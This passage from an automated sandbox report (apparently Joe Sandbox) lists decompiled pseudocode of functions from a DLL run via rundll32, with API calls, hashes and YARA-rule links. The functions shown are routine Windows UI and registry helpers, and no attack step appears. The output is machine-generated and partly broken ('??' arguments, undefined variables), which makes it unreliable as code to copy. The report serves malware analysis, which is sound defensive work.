							 *(_t85 - 0x20) = 1;
							goto L15;
						}
					}
				}
			}

APIs

GetStringTypeW.KERNEL32(00000001,10042704,00000001,?,10042730,0000001C,1001294D,00000001,00000020,00000100,?,00000000), ref: 10018461
GetLastError.KERNEL32 ref: 10018473
MultiByteToWideChar.KERNEL32(?,00000000,00000000,10012C1E,00000000,00000000,10042730,0000001C,1001294D,00000001,00000020,00000100,?,00000000), ref: 100184D5
MultiByteToWideChar.KERNEL32(?,00000001,00000000,10012C1E,?,00000000), ref: 10018553
GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 10018565

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ByteCharMultiStringTypeWide$ErrorLast
String ID:
API String ID: 3581945363-0
Opcode ID: c5b59c8c516efa9e1f4051a0dd57c54a1c21c008c676a274ba4cfa4b85049daa
Instruction ID: 357f909d61fdf3067703904fdff93fde9d84214a81f0f6dffe892fe1b28005b1
Opcode Fuzzy Hash: c5b59c8c516efa9e1f4051a0dd57c54a1c21c008c676a274ba4cfa4b85049daa
Instruction Fuzzy Hash: D2418071900629ABEB12CF60CC85A9E3BA6FF497A0F114108F810EE191D735DF91DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1002B9F8 Relevance: 9.1, APIs: 6, Instructions: 122
windowCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E1002B9F8(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v17;
				char _v18;
				signed int _v19;
				char _v28;
				long _v32;
				signed int _v36;
				char _v52;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed char _t63;
				intOrPtr* _t85;
				intOrPtr* _t88;

				_t41 =  *0x1004c470; // 0x12db9c4b
				_t88 = __ecx;
				_push( &_v28);
				_push(_a4);
				_v8 = _t41;
				_push(0x417);
				 *((intOrPtr*)( *__ecx + 0x110))();
				_t44 = _a8;
				 *(_t44 + 8) =  *(_t44 + 8) ^ 0x00000004;
				_v18 = 0;
				_v17 = 0;
				 *((char*)(_t44 + 0xa)) = 0;
				 *((char*)(_t44 + 0xb)) = 0;
				if(E10011FB0(_t44,  &_v28, 0x14) != 0) {
					_v36 = E100202AB(_t88);
					E100202DF(_t88, 0x10000000, 0, 0);
					 *((intOrPtr*)( *_t88 + 0x110))(0x416, _a4, 0, __edi);
					_v32 = SendMessageA( *(_t88 + 0x1c), 0x43d, 0, 0);
					SendMessageA( *(_t88 + 0x1c), 0xb, 0, 0);
					SendMessageA( *(_t88 + 0x1c), 0x43c, _v32 + 1, 0);
					SendMessageA( *(_t88 + 0x1c), 0x43c, _v32, 0);
					SendMessageA( *(_t88 + 0x1c), 0xb, 1, 0);
					_t85 = _a8;
					 *((intOrPtr*)( *_t88 + 0x110))(0x415, _a4, _t85);
					E100202DF(_t88, 0, _v36 & 0x10000000, 0);
					_t63 =  *((intOrPtr*)(_t85 + 9));
					if(((_t63 ^ _v19) & 0x00000001) != 0 || (_t63 & 0x00000001) != 0 &&  *_t85 != _v28) {
						_push(1);
						_push(0);
						goto L7;
					} else {
						_push( &_v52);
						_push(_a4);
						_push(0x41d);
						if( *((intOrPtr*)( *_t88 + 0x110))() != 0) {
							_push(1);
							_push( &_v52);
							L7:
							_t45 = InvalidateRect( *(_t88 + 0x1c), ??, ??);
						}
					}
				}
				return E100117AE(_t45, _v8);
			}

APIs

Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6

SendMessageA.USER32 ref: 1002BA88
SendMessageA.USER32 ref: 1002BA94
SendMessageA.USER32 ref: 1002BAA4
SendMessageA.USER32 ref: 1002BAB2
SendMessageA.USER32 ref: 1002BABC
InvalidateRect.USER32(?,00000000,00000001), ref: 1002BB26

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MessageSend$InvalidateLongRectWindow
String ID:
API String ID: 74886174-0
Opcode ID: b589b2aa5c9a58cfbe72108c5627e30e0f5fe5e27cf1599c4597c7e22d4c9a41
Instruction ID: d3f4ff1b3068862bce3741e6c92e476afb765aaf48ff9a7e93f31cae0c4b6ca1
Opcode Fuzzy Hash: b589b2aa5c9a58cfbe72108c5627e30e0f5fe5e27cf1599c4597c7e22d4c9a41
Instruction Fuzzy Hash: D0416CB0600248BFEB11DB94DC95EFEBBB9EF48744F414459FA41AB291C6B0AD45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10030A77 Relevance: 9.1, APIs: 6, Instructions: 101
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E10030A77(void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct tagMSG _v32;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t30;
				void* _t32;
				void* _t34;
				void* _t36;
				intOrPtr* _t37;
				void* _t41;
				intOrPtr _t55;
				void* _t56;
				void* _t57;
				void* _t60;
				void* _t61;
				intOrPtr* _t62;

				_t58 = __edx;
				_t60 = __ecx;
				if(GetCapture() != 0) {
					L20:
					return 0;
				}
				E100220EE(_t61, SetCapture( *( *((intOrPtr*)(_t60 + 0x68)) + 0x1c)));
				if(E100220EE(_t61, GetCapture()) !=  *((intOrPtr*)(_t60 + 0x68))) {
					L19:
					E100308EB(_t60, _t72);
					goto L20;
				} else {
					while(GetMessageA( &_v32, 0, 0, 0) != 0) {
						_t30 = _v32.message - 0x100;
						if(_t30 == 0) {
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							if( *((intOrPtr*)(_t60 + 0x88)) != 0) {
								E1003075A(_t60, _v32.wParam, 1);
							}
							__eflags = _v32.wParam - 0x1b;
							if(__eflags != 0) {
								L18:
								_t32 = E100220EE(_t61, GetCapture());
								_t72 = _t32 -  *((intOrPtr*)(_t60 + 0x68));
								if(_t32 ==  *((intOrPtr*)(_t60 + 0x68))) {
									continue;
								}
							}
							goto L19;
						}
						_t34 = _t30 - 1;
						if(_t34 == 0) {
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							if(__eflags != 0) {
								E1003075A(_t60, _v32.wParam, 0);
							}
							goto L18;
						}
						_t36 = _t34 - 0xff;
						if(_t36 == 0) {
							_t55 = _v32.pt;
							_t58 = _v8;
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							_push(_t55);
							_push(_t55);
							_t37 = _t62;
							 *_t37 = _t55;
							 *((intOrPtr*)(_t37 + 4)) = _v8;
							_t56 = _t60;
							if( *((intOrPtr*)(_t60 + 0x88)) == 0) {
								E1003078E(_t56, 0);
							} else {
								E100306DB(_t56);
							}
							goto L18;
						}
						_t41 = _t36;
						if(_t41 == 0) {
							__eflags =  *((intOrPtr*)(_t60 + 0x88));
							_t57 = _t60;
							if(__eflags == 0) {
								E10030A33(_t61, __eflags);
							} else {
								E10030930(_t57, _t58, 0, _t60, __eflags);
							}
							return 1;
						}
						if(_t41 == 0) {
							goto L19;
						}
						DispatchMessageA( &_v32);
						goto L18;
					}
					_push(_v32.wParam);
					E1003A098();
					goto L19;
				}
			}

APIs

GetCapture.USER32 ref: 10030A88
SetCapture.USER32(?), ref: 10030A98
GetCapture.USER32 ref: 10030AA4
GetMessageA.USER32 ref: 10030ABE
DispatchMessageA.USER32 ref: 10030AF0
GetCapture.USER32 ref: 10030B4E

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Capture$Message$Dispatch
String ID:
API String ID: 3654672037-0
Opcode ID: e6b58cd4b20e416105edfb9c4440ad9ba75aaff5f0d161abc900f8068c81e4c6
Instruction ID: d9b79505f63fc07e8b5b8f3565facbd5cf555a7e12dc77f8d6b56f2636bb58fe
Opcode Fuzzy Hash: e6b58cd4b20e416105edfb9c4440ad9ba75aaff5f0d161abc900f8068c81e4c6
Instruction Fuzzy Hash: 8431B434A02609AFCB63DBB58C65D6FF6E8EF80787F104419B445DA163CB30A980D762

Uniqueness

Uniqueness Score: -1.00%

Function 1002A1CA Relevance: 9.1, APIs: 6, Instructions: 69
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002A1CA(void* __ecx) {
				struct HACCEL__* _t25;
				void* _t44;
				void* _t45;
				struct HINSTANCE__* _t46;
				struct HINSTANCE__* _t47;
				struct HINSTANCE__* _t48;

				_t44 = __ecx;
				_t40 = __ecx + 0x60;
				_t25 =  *(__ecx + 0x60);
				_t45 = 0;
				if( *((intOrPtr*)(_t25 - 0xc)) == 0) {
					_t25 = E10006A60(_t40,  *((intOrPtr*)(__ecx + 0x3c)));
				}
				if( *(_t44 + 0x44) != _t45 &&  *((intOrPtr*)(_t44 + 0x2c)) == _t45) {
					_t48 =  *(E100373B5() + 0xc);
					 *((intOrPtr*)(_t44 + 0x2c)) = LoadMenuA(_t48,  *(_t44 + 0x44) & 0x0000ffff);
					_t25 = LoadAcceleratorsA(_t48,  *(_t44 + 0x44) & 0x0000ffff);
					 *(_t44 + 0x30) = _t25;
					_t45 = 0;
				}
				if( *(_t44 + 0x40) != _t45 &&  *((intOrPtr*)(_t44 + 0x34)) == _t45) {
					_t47 =  *(E100373B5() + 0xc);
					 *((intOrPtr*)(_t44 + 0x34)) = LoadMenuA(_t47,  *(_t44 + 0x40) & 0x0000ffff);
					_t25 = LoadAcceleratorsA(_t47,  *(_t44 + 0x40) & 0x0000ffff);
					 *(_t44 + 0x38) = _t25;
					_t45 = 0;
				}
				if( *(_t44 + 0x48) != _t45 &&  *((intOrPtr*)(_t44 + 0x24)) == _t45) {
					_t46 =  *(E100373B5() + 0xc);
					 *((intOrPtr*)(_t44 + 0x24)) = LoadMenuA(_t46,  *(_t44 + 0x48) & 0x0000ffff);
					_t25 = LoadAcceleratorsA(_t46,  *(_t44 + 0x48) & 0x0000ffff);
					 *(_t44 + 0x28) = _t25;
				}
				return _t25;
			}

APIs

LoadMenuA.USER32 ref: 1002A208
LoadAcceleratorsA.USER32 ref: 1002A213
LoadMenuA.USER32 ref: 1002A232
LoadAcceleratorsA.USER32 ref: 1002A23D
LoadMenuA.USER32 ref: 1002A25C
LoadAcceleratorsA.USER32 ref: 1002A267

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Load$AcceleratorsMenu
String ID:
API String ID: 144087665-0
Opcode ID: 62af814d51333b06cd62be60a646d7531518e2420bbbd48c9c7e9b7b2b0652c4
Instruction ID: 79ec512449ce6a4c7bf2710ae8ff5bed15bebc86ac40dbf708adfd4365bfde7a
Opcode Fuzzy Hash: 62af814d51333b06cd62be60a646d7531518e2420bbbd48c9c7e9b7b2b0652c4
Instruction Fuzzy Hash: 8821EA75401B18DFC3B0EF6A9940937F3F8FF09651751446FEA8A86912DA36F890DB60

Uniqueness

Uniqueness Score: -1.00%

Function 1002B105 Relevance: 9.1, APIs: 6, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002B105(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t7;
				void* _t13;
				struct HWND__** _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				_t17 = _t18;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t16 = _t17;
						_t7 = _t17;
						if(_t17 == 0) {
							L10:
							if(_t18 == 0 && _t17 != 0) {
								_t17 = GetLastActivePopup(_t17);
							}
							_t15 = _a8;
							if(_t15 != 0) {
								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
									 *_t15 =  *_t15 & 0x00000000;
								} else {
									 *_t15 = _t16;
									EnableWindow(_t16, 0);
								}
							}
							return _t17;
						} else {
							goto L9;
						}
						do {
							L9:
							_t16 = _t7;
							_t7 = GetParent(_t7);
						} while (_t7 != 0);
						goto L10;
					}
					_t17 = GetParent(_t17);
					L7:
					if(_t17 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t13 = E1002B0CC();
				if(_t13 != 0) {
					L4:
					_t17 =  *(_t13 + 0x1c);
					goto L7;
				}
				_t13 = E10006C53();
				if(_t13 != 0) {
					goto L4;
				}
				_t17 = 0;
				goto L8;
			}

APIs

GetWindowLongA.USER32 ref: 1002B137
GetParent.USER32(?), ref: 1002B145
GetParent.USER32(?), ref: 1002B158
GetLastActivePopup.USER32(?), ref: 1002B167
IsWindowEnabled.USER32(?), ref: 1002B17C
EnableWindow.USER32(?,00000000), ref: 1002B18F

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: b64e7204216b1f048a42a3b80a98cdaf99d57a40f09b93da801bfd405b8b7097
Instruction ID: ef498eb2053f32fc83163eb1be06eb9c016c70d7a0359ba6d8f1e9348af6cf1d
Opcode Fuzzy Hash: b64e7204216b1f048a42a3b80a98cdaf99d57a40f09b93da801bfd405b8b7097
Instruction Fuzzy Hash: E111A332601F764FD362DA6AACA4B2B77DCDF41BD1FD20159EC04D7211DB60EC104290

Uniqueness

Uniqueness Score: -1.00%

Function 1002B501 Relevance: 9.1, APIs: 6, Instructions: 57
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002B501(intOrPtr __ecx, CHAR* _a4, char* _a8, char* _a12) {
				long _t21;
				void* _t28;

				if( *((intOrPtr*)(__ecx + 0x50)) == 0) {
					return WritePrivateProfileStringA(_a4, _a8, _a12,  *(__ecx + 0x64));
				}
				if(_a8 != 0) {
					_t28 = E10035959(__ecx, _a4);
					if(_a12 != 0) {
						if(_t28 == 0) {
							L3:
							return 0;
						}
						_t21 = RegSetValueExA(_t28, _a8, 0, 1, _a12, lstrlenA(_a12) + 1);
						L10:
						RegCloseKey(_t28);
						return 0 | _t21 == 0x00000000;
					}
					if(_t28 == 0) {
						goto L3;
					}
					_t21 = RegDeleteValueA(_t28, _a8);
					goto L10;
				}
				_t28 = E100358C8(__ecx);
				if(_t28 != 0) {
					_t21 = RegDeleteKeyA(_t28, _a4);
					goto L10;
				}
				goto L3;
			}

APIs

RegDeleteKeyA.ADVAPI32(00000000,?), ref: 1002B525
RegDeleteValueA.ADVAPI32(00000000,00000000,?,00000000), ref: 1002B545
RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,10024C29,?), ref: 1002B570

Part of subcall function 100358C8: RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,00000000,00000000), ref: 100358F6
Part of subcall function 100358C8: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10035919
Part of subcall function 100358C8: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 10035935
Part of subcall function 100358C8: RegCloseKey.ADVAPI32(?), ref: 10035945
Part of subcall function 100358C8: RegCloseKey.ADVAPI32(?), ref: 1003594F

WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002B58B

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Close$CreateDelete$OpenPrivateProfileStringValueWrite
String ID:
API String ID: 1886894508-0
Opcode ID: cbf87bc0068c303cc6394e99f804432e3955d1a9386c7571ee80164618b64494
Instruction ID: c8f527a64b8234d0edd8db9930868310c0db2fd70ee1d53d59517915cf010f6f
Opcode Fuzzy Hash: cbf87bc0068c303cc6394e99f804432e3955d1a9386c7571ee80164618b64494
Instruction Fuzzy Hash: D1114832401E79FFDB128F61DC48F9E3BA9EF043A1F814510FD049D061CB328A61AB90

Uniqueness

Uniqueness Score: -1.00%

Function 10031F4A Relevance: 9.1, APIs: 6, Instructions: 56
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E10031F4A(void* __ebx, void* __ecx, void* __edi, void* __esi, struct HWND__* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v528;
				void* _v532;
				char _v536;
				intOrPtr _t15;
				long _t22;
				void* _t25;
				void* _t29;

				_t15 =  *0x1004c470; // 0x12db9c4b
				_v8 = _t15;
				_push( &_v532);
				_push( &_v536);
				_push(_a8);
				_push(0x3e8);
				_t29 = __ecx;
				L1001CA38();
				if(lstrlenA(GlobalLock(_v532)) < 0x208) {
					_t22 = GlobalUnlock(_v532);
					_push(_v532);
					_push(0x8000);
					_push(0x3e4);
					_push(0x3e8);
					_push(_a8);
					L1001CA32();
					PostMessageA(_a4, 0x3e4,  *(_t29 + 0x1c), _t22);
					if(E100203CE(_t29) != 0) {
						_t25 = E100373B5();
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t25 + 4)))) + 0xa0))( &_v528);
					}
				}
				return E100117AE(0, _v8);
			}

APIs

UnpackDDElParam.USER32 ref: 10031F76
GlobalLock.KERNEL32 ref: 10031F81
lstrlenA.KERNEL32(00000000), ref: 10031F88
GlobalUnlock.KERNEL32(?), ref: 10031F9C
ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 10031FB7
PostMessageA.USER32 ref: 10031FC4

Part of subcall function 100203CE: IsWindowEnabled.USER32(?), ref: 100203D7

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: GlobalParam$EnabledLockMessagePostReuseUnlockUnpackWindowlstrlen
String ID:
API String ID: 462239228-0
Opcode ID: 9b3d271c77589773dafac36f7ca5bc7fab3ad5ea6926df52b529a664096dacb0
Instruction ID: bfbb9d00b13f65a0ab326070f2ebd1bafe94df8b281a4b7973d805b3987b007f
Opcode Fuzzy Hash: 9b3d271c77589773dafac36f7ca5bc7fab3ad5ea6926df52b529a664096dacb0
Instruction Fuzzy Hash: 8D111C3554121CAFDB12DFA1DC88DDE7BB9FF55351F0045A5F809EA262DA34DE808B60

Uniqueness

Uniqueness Score: -1.00%

Function 10029BA4 Relevance: 9.0, APIs: 6, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10029BA4(struct HWND__* _a4) {
				struct HWND__* _t3;
				struct HWND__* _t6;
				struct HWND__* _t11;
				struct HWND__* _t14;

				_t3 = GetFocus();
				_t14 = _t3;
				if(_t14 != 0) {
					_t11 = _a4;
					if(_t14 == _t11) {
						L10:
						return _t3;
					}
					if(E10029A8E(_t14, 3) != 0) {
						L5:
						if(_t11 == 0 || (GetWindowLongA(_t11, 0xfffffff0) & 0x40000000) == 0) {
							L8:
							_t3 = SendMessageA(_t14, 0x14f, 0, 0);
							goto L9;
						} else {
							_t6 = GetParent(_t11);
							_t3 = GetDesktopWindow();
							if(_t6 == _t3) {
								L9:
								goto L10;
							}
							goto L8;
						}
					}
					_t3 = GetParent(_t14);
					_t14 = _t3;
					if(_t14 == _t11) {
						goto L9;
					}
					_t3 = E10029A8E(_t14, 2);
					if(_t3 == 0) {
						goto L9;
					}
					goto L5;
				}
				return _t3;
			}

APIs

GetFocus.USER32 ref: 10029BA5

Part of subcall function 10029A8E: GetWindowLongA.USER32 ref: 10029AA7

GetParent.USER32(00000000), ref: 10029BCE

Part of subcall function 10029A8E: GetClassNameA.USER32(00000000,?,0000000A), ref: 10029AC2
Part of subcall function 10029A8E: lstrcmpiA.KERNEL32(?,combobox), ref: 10029AD1

GetWindowLongA.USER32 ref: 10029BE9
GetParent.USER32(10032120), ref: 10029BF7
GetDesktopWindow.USER32 ref: 10029BFB
SendMessageA.USER32 ref: 10029C0F

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$LongParent$ClassDesktopFocusMessageNameSendlstrcmpi
String ID:
API String ID: 2818563221-0
Opcode ID: e89a53c623c721cb0c3fcde6a2588c450b9b76455553080e70e491aeb3ad2bbb
Instruction ID: cea5fa679d97d2953b6d76dc507eb4c5e7da3a0c11b163d723fb81d4da4a6e61
Opcode Fuzzy Hash: e89a53c623c721cb0c3fcde6a2588c450b9b76455553080e70e491aeb3ad2bbb
Instruction Fuzzy Hash: 7FF0A932500A306EE353A62B6D88F5E61D8DF81BD0FB20214F459E6192EB24AC8145A9

Uniqueness

Uniqueness Score: -1.00%

Function 10037A96 Relevance: 9.0, APIs: 6, Instructions: 47
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E10037A96(void* _a4, char* _a8, char* _a12) {
				void* _t14;
				long _t18;
				signed int _t20;
				long _t25;

				if(_a12 != 0) {
					if(RegCreateKeyA(0x80000000, _a4,  &_a4) != 0) {
						L6:
						_t14 = 0;
						L7:
						return _t14;
					}
					_t25 = RegSetValueExA(_a4, _a12, 0, 1, _a8, lstrlenA(_a8) + 1);
					_t18 = RegCloseKey(_a4);
					if(_t18 != 0 || _t25 != 0) {
						goto L6;
					} else {
						_t14 = _t18 + 1;
						goto L7;
					}
				}
				_t20 = RegSetValueA(0x80000000, _a4, 1, _a8, lstrlenA(_a8));
				asm("sbb eax, eax");
				return  ~_t20 + 1;
			}

APIs

lstrlenA.KERNEL32(?), ref: 10037AA2
RegSetValueA.ADVAPI32(80000000,?,00000001,?,00000000), ref: 10037AB6
RegCreateKeyA.ADVAPI32(80000000,?,?), ref: 10037AD0
lstrlenA.KERNEL32(?), ref: 10037ADD
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,?,00000001), ref: 10037AF2
RegCloseKey.ADVAPI32(?), ref: 10037AFD

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Valuelstrlen$CloseCreate
String ID:
API String ID: 306239685-0
Opcode ID: 44992d35b15f20819090c12f9012e6152085e8f08d1dc228d24d782121a6f8e9
Instruction ID: 36ac44db30e1571f4bd1a6b15574b4d5f9e82ccdf85d97020e0dea724d6fc6de
Opcode Fuzzy Hash: 44992d35b15f20819090c12f9012e6152085e8f08d1dc228d24d782121a6f8e9
Instruction Fuzzy Hash: 4501043220016DFFEB235FA1DD48F9A7BA9FB08792F108410FE1AD9061D3718A60DB50

Uniqueness

Uniqueness Score: -1.00%

Function 10029C98 Relevance: 9.0, APIs: 6, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E10029C98(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t12;
				struct HWND__* _t21;

				ClientToScreen(_a4,  &_a8);
				_t12 = GetWindow(_a4, 5);
				while(1) {
					_t21 = _t12;
					if(_t21 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
						GetWindowRect(_t21,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t21;
						}
					}
					_t12 = GetWindow(_t21, 2);
				}
				return _t12;
			}

0x10029ca7
0x10029cf8
0x10029cf8
0x10029cfa
0x10029cfe
0x00000000
0x00000000
0x10029cc4
0x10029cdb
0x10029ce1
0x10029cf3
0x00000000
0x10029d06
0x10029cf3
0x10029cf8
0x10029cf8
0x10029d03

APIs

ClientToScreen.USER32(?,?), ref: 10029CA7
GetDlgCtrlID.USER32 ref: 10029CBB
GetWindowLongA.USER32 ref: 10029CC9
GetWindowRect.USER32 ref: 10029CDB
PtInRect.USER32(?,?,?), ref: 10029CEB
GetWindow.USER32(?,00000005), ref: 10029CF8

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

